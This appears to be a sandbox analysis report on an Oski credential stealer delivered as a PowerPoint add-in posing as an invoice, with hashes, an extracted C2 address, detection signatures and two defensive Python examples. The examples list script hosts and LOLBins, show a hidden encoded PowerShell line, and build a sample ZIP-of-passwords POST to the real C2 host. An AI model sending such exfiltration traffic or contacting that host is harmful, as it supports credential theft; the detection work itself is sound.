General

Target: Rfq Proforma Invoice 865678.ppam
Size: 21KB
Sample: 210810-4gr7jesxxa
MD5: 2377c2fb68272650616d78bd7a3ed3f9
SHA1: 20eaa630d4eb06ae9385b5d46ab0d54180dc43e4
SHA256: 258a576bd9abba2c1366f3124d808529a0232f61619f455d2277546172dec5d2
SHA512: eafa5c07af843aeab33462dbe4171113eb6b6eec78e30997fc15409a180171b91292d02f74f5dd8c707cae58c6a9e9d2df4d4795621ee3e108686fc94f90b1e7
Static task: static1

Behavioral task: behavioral1
Sample: Rfq Proforma Invoice 865678.ppam
Resource: win7v20210408

Behavioral task: behavioral2
Sample: Rfq Proforma Invoice 865678.ppam
Resource: win10v20210410
Malware Config

Extracted
Family: oski
C2: tunqyuindia.com/mar3/
Targets

Target: Rfq Proforma Invoice 865678.ppam
Size: 21KB
MD5 / SHA1 / SHA256 / SHA512: as listed under General above
Score: 10/10
Signatures

- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
- suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
- Downloads MZ/PE file
- Loads dropped DLL
- Accesses cryptocurrency files/wallets, possible credential harvesting
- Suspicious use of SetThreadContext
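The "Process spawned unexpected child process" signature is a parent/child check: an Office host that launches a script interpreter, a LOLBin, or an executable dropped into a user-writable directory is the signal that a macro or exploit ran. The following is an added example, not part of this report and not the sandbox's own rule: it runs that check over constructed Sysmon Event ID 1-style records. The report does not name the processes involved; POWERPNT.EXE as the macro host (a .ppam is a PowerPoint add-in), the child names, paths, PIDs and command lines are all assumptions.

```python
"""Flag an Office process spawning a child it should not.

Added example, not part of the sandbox report and not the sandbox's own rule.
The events below are constructed to resemble Sysmon Event ID 1 fields; the
process names, paths and command lines are assumptions, since the report only
states that an unexpected child process was spawned.
"""
import ntpath
import re
from typing import Any, Dict, Iterable, List, Optional

# Office hosts whose macros/add-ins are the usual initial-access vector.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Children an Office host may start in normal use (assumption; tune per estate).
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe", "werfault.exe", "msosync.exe"}

# Script hosts and LOLBins: when Office launches these, treat it as high severity.
HIGH_RISK_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
    "msiexec.exe", "schtasks.exe",
}

# A child executed from a user-writable location is a dropped payload: also high.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp)\\", re.IGNORECASE)


def _name(image: Optional[str]) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any platform."""
    return ntpath.basename(image or "").lower()


def classify(event: Dict[str, Any]) -> Optional[str]:
    """Return 'high', 'medium' or None for one process-creation event."""
    parent = _name(event.get("ParentImage"))
    child = _name(event.get("Image"))
    if parent not in OFFICE_PARENTS or not child:
        return None                      # not an Office parent: out of scope
    if child in EXPECTED_CHILDREN:
        return None                      # allow-listed helper process
    if child in HIGH_RISK_CHILDREN or USER_WRITABLE.search(str(event.get("Image", ""))):
        return "high"
    return "medium"                      # unexpected, but not a known-bad pattern


def find_unexpected_children(events: Iterable[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Run classify() over a stream of events and collect alerts in order."""
    alerts = []
    for ev in events:
        severity = classify(ev)
        if severity is not None:
            alerts.append({
                "severity": severity,
                "parent": _name(ev.get("ParentImage")),
                "child": _name(ev.get("Image")),
                "pid": ev.get("ProcessId"),
                "cmdline": ev.get("CommandLine", ""),
            })
    return alerts


# Constructed sample events (assumed, not taken from the report).
PPT = r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
SAMPLE_EVENTS = [
    {"ProcessId": 3120, "Image": PPT, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{PPT}" "C:\\Users\\victim\\Downloads\\Rfq Proforma Invoice 865678.ppam"'},
    {"ProcessId": 3188, "Image": r"C:\Windows\splwow64.exe", "ParentImage": PPT,
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ProcessId": 3404, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": PPT, "CommandLine": "powershell.exe -nop -w hidden -enc <base64>"},
    {"ProcessId": 3520, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": PPT,
     "CommandLine": "notepad.exe"},
    {"ProcessId": 3600, "Image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "ParentImage": PPT, "CommandLine": r"C:\Users\victim\AppData\Local\Temp\update.exe"},
]

if __name__ == "__main__":
    for alert in find_unexpected_children(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["child"], alert["cmdline"])
```

Three of the five constructed events fire: PowerShell (script host) and the executable under %TEMP% as high, notepad.exe as medium because it is unexpected but matches no known-bad pattern. The allow-list is deliberately short; the correct tuning is to learn the real Office children in your own estate rather than to grow the block-list.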
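The two Suricata hits describe the same event from the network side: the stealer bundles what it harvested into a ZIP and sends it in an outbound HTTP POST, and the archive's entry names (here Passwords.txt) are visible in cleartext inside the body. As an added example, not the Suricata rules themselves and not traffic captured from this sample, the code below builds a constructed multipart POST carrying an in-memory ZIP, then walks the ZIP local file headers inside the request body and alerts on a watched entry name. The host is the C2 from the extracted config above; the request path, form layout, file contents and the watch list are assumptions.

```python
"""Spot a ZIP containing Passwords.txt inside an outbound HTTP POST.

Added example, not the Suricata rule itself and not traffic captured from
this sample. The request is constructed here: the host is the C2 from the
report's extracted config, while the path, form layout, file contents and
watch list are assumptions.
"""
import io
import struct
import zipfile
from typing import Dict, List

LOCAL_HDR = b"PK\x03\x04"          # ZIP local file header signature
WATCHLIST = {"passwords.txt"}      # entry names that indicate stealer output (assumption)


def build_constructed_post(host: str, path: str, files: Dict[str, bytes]) -> bytes:
    """Build a multipart/form-data POST carrying an in-memory ZIP of `files`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    boundary = "----constructedboundary"
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="file"; filename="data.zip"\r\n'
        "Content-Type: application/zip\r\n\r\n"
    ).encode() + buf.getvalue() + f"\r\n--{boundary}--\r\n".encode()
    head = (
        f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


def zip_entry_names(payload: bytes) -> List[str]:
    """Walk ZIP local file headers found anywhere in `payload` and return entry names.

    Only local headers are read, as an IDS would on a stream: no central
    directory is needed, so even a truncated upload yields the names.
    """
    names = []
    off = payload.find(LOCAL_HDR)
    while off != -1 and off + 30 <= len(payload):
        # flags, method, time, date, crc32, compressed size, uncompressed size,
        # name length, extra length: 24 bytes following the 4-byte signature + version.
        flags, _, _, _, _, csize, _, nlen, xlen = struct.unpack_from("<HHHHIIIHH", payload, off + 6)
        data_start = off + 30 + nlen + xlen
        names.append(payload[off + 30:off + 30 + nlen].decode("utf-8", "replace"))
        if flags & 0x0008 and csize == 0:
            # Streamed entry with a data descriptor: size unknown, scan for the next header.
            off = payload.find(LOCAL_HDR, data_start)
        else:
            off = payload.find(LOCAL_HDR, data_start + csize)
    return names


def inspect_request(raw: bytes, watchlist=WATCHLIST) -> Dict[str, object]:
    """Return ZIP entry names and watch-list hits for one raw HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    is_post = head.split(b"\r\n", 1)[0].startswith(b"POST ")
    entries = zip_entry_names(body) if is_post else []
    hits = [n for n in entries if n.rsplit("/", 1)[-1].lower() in watchlist]
    return {"post": is_post, "entries": entries, "hits": hits, "alert": bool(hits)}


# Constructed sample request: host from the extracted config, everything else assumed.
SAMPLE_REQUEST = build_constructed_post(
    "tunqyuindia.com", "/mar3/",
    {"Passwords.txt": b"https://mail.example/\tvictim\thunter2\r\n",
     "Information.txt": b"Windows 10 Pro\r\n"},
)

if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
```

Two caveats a practitioner would want: local headers are written by the sender and can be forged or padded, so this is a triage signal rather than proof of content; and the scan only sees cleartext HTTP, so the same exfil over TLS needs TLS interception or endpoint telemetry (the process-creation and file-access signatures in this report) to catch.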